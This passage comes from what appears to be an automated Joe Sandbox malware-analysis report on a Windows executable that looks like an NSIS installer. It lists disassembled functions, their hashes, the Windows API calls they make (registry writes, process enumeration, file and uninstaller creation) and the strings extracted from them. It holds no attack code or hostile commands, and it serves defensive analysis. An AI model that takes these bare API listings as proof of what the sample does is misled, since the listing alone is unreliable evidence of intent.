                                                                                                                                                                                                                                                                                    • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                    • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                                                                                                                                    • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                                                                                                                                    • API String ID: 20674999-2124804629
                                                                                                                                                                                                                                                                                    • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                    • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                                                                                                                                      • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                                                                                                                                    • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                                                                                                                                    • String ID: F$N$open
                                                                                                                                                                                                                                                                                    • API String ID: 3928313111-1104729357
                                                                                                                                                                                                                                                                                    • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                    • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                                                                                                                                      • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                                                                                                                                      • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                                                                                                                                    • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                                                                                                                                    • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                                                                                                                                      • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                                                                                                                                      • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                                                                                                                                    • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                                                                                                                                    • API String ID: 565278875-3368763019
                                                                                                                                                                                                                                                                                    • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                    • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F2414B322082197FE7206B61DD4CE6F3E6CDF4A758B12013AF586F21D1D6399C10867E
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                                                                                                                                                                                                                                                                    • BeginPaint.USER32(?,?), ref: 00401047
                                                                                                                                                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 0040105B
                                                                                                                                                                                                                                                                                    • CreateBrushIndirect.GDI32(00000000), ref: 004010D8
                                                                                                                                                                                                                                                                                    • FillRect.USER32(00000000,?,00000000), ref: 004010ED
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 004010F6
                                                                                                                                                                                                                                                                                    • CreateFontIndirectW.GDI32(?), ref: 0040110E
                                                                                                                                                                                                                                                                                    • SetBkMode.GDI32(00000000,00000001), ref: 0040112F
                                                                                                                                                                                                                                                                                    • SetTextColor.GDI32(00000000,000000FF), ref: 00401139
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,?), ref: 00401149
                                                                                                                                                                                                                                                                                    • DrawTextW.USER32(00000000,00476AA0,000000FF,00000010,00000820), ref: 0040115F
                                                                                                                                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 00401169
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 0040116E
                                                                                                                                                                                                                                                                                    • EndPaint.USER32(?,?), ref: 00401177
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                                                                                                                                                                                                                                                    • String ID: F
                                                                                                                                                                                                                                                                                    • API String ID: 941294808-1304234792
                                                                                                                                                                                                                                                                                    • Opcode ID: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                    • Instruction ID: 3a901b8e11bd10f40e8c3d59bf329074d7a31f92ad936af625f7db958ebfa50f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2efc14ad74cb110e0ad817299842ebea0c3d587f520aff37d9c167bf14942bce
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF518772800209AFCF05CF95DD459AFBBB9FF45315F00802AF952AA1A1C738EA50DFA4
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • RegCreateKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004028DA
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(004140F8,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 004028FD
                                                                                                                                                                                                                                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,004140F8,?,?,?,?,?,?,?,?,00000011,00000002), ref: 004029BC
                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 004029E4
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • WriteRegBin: "%s\%s" "%s"="%s", xrefs: 004029A1
                                                                                                                                                                                                                                                                                    • WriteReg: error writing into "%s\%s" "%s", xrefs: 004029D4
                                                                                                                                                                                                                                                                                    • WriteRegExpandStr: "%s\%s" "%s"="%s", xrefs: 0040292A
                                                                                                                                                                                                                                                                                    • WriteRegDWORD: "%s\%s" "%s"="0x%08x", xrefs: 00402959
                                                                                                                                                                                                                                                                                    • WriteReg: error creating key "%s\%s", xrefs: 004029F5
                                                                                                                                                                                                                                                                                    • WriteRegStr: "%s\%s" "%s"="%s", xrefs: 00402918
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: lstrlen$CloseCreateValuewvsprintf
                                                                                                                                                                                                                                                                                    • String ID: WriteReg: error creating key "%s\%s"$WriteReg: error writing into "%s\%s" "%s"$WriteRegBin: "%s\%s" "%s"="%s"$WriteRegDWORD: "%s\%s" "%s"="0x%08x"$WriteRegExpandStr: "%s\%s" "%s"="%s"$WriteRegStr: "%s\%s" "%s"="%s"
                                                                                                                                                                                                                                                                                    • API String ID: 1641139501-220328614
                                                                                                                                                                                                                                                                                    • Opcode ID: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                    • Instruction ID: c6ff7831871a22410ebf281ca69ba80d881ba5d3dc99c3f31bea2db7712f227d
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 066b4e300930aa0920c328732a1d1fc015c018ed119ca6dd3c3d5e24db852520
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE418BB2D00208BFCF11AF91CD46DEEBB7AEF44344F20807AF605761A2D3794A509B69
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,00406300,00000000), ref: 0040612A
                                                                                                                                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00476240,?,00000000,00000000,?,?,00406300,00000000), ref: 00406168
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,00476240,40000000,00000004), ref: 004061A1
                                                                                                                                                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00476240,40000000,00000004), ref: 004061AD
                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),0040A678,?,00000000,00000000,?,?,00406300,00000000), ref: 004061C7
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,00406300,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,00406300,00000000,?,?,00406300,00000000), ref: 004061E3
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
                                                                                                                                                                                                                                                                                    • String ID: @bG$RMDir: RemoveDirectory invalid input("")
                                                                                                                                                                                                                                                                                    • API String ID: 3734993849-3206598305
                                                                                                                                                                                                                                                                                    • Opcode ID: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                    • Instruction ID: 195d9f7db6fc7c0c2d4377fc833027156c916e626c5a885f84869a8699de3d55
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 48839086a200bf93aa32383a4ca0414da094928b154be734d4a38c22442d7c90
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0121C271500240EBD710ABA8DD88D9B3B6CEB06334B118336F52ABA1E1D7389D85C7AC
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,?,?,000000F0), ref: 00402EA9
                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,?,?,000000F0), ref: 00402EC5
                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(FFFFFD66), ref: 00402EFE
                                                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,000000F0), ref: 00402F10
                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00402F17
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,000000F0), ref: 00402F2F
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?), ref: 00402F56
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • created uninstaller: %d, "%s", xrefs: 00402F3B
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Global$AllocFileFree$CloseDeleteHandleWrite
                                                                                                                                                                                                                                                                                    • String ID: created uninstaller: %d, "%s"
                                                                                                                                                                                                                                                                                    • API String ID: 3294113728-3145124454
                                                                                                                                                                                                                                                                                    • Opcode ID: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                    • Instruction ID: bd1c3f70b2adfd396ae192ad3b35d3c6df9fc0ba6a3ee2c413e2f7d1cf6bca0f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 43406d439bebe3a41a7ad8946693a81c25abcec0bebba575c0e34f0bdeff8a90
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CF319E72800115ABDB11AFA9CD89DAF7FB9EF08364F10023AF515B61E1C7394E419B98
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(00445D80,00424179,74DF23A0,00000000), ref: 00404FD6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrlenW.KERNEL32(004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FE6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: lstrcatW.KERNEL32(00445D80,004034E5,004034E5,00445D80,00424179,74DF23A0,00000000), ref: 00404FF9
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SetWindowTextW.USER32(00445D80,00445D80), ref: 0040500B
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405031
                                                                                                                                                                                                                                                                                      • Part of subcall function 00404F9E: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040504B
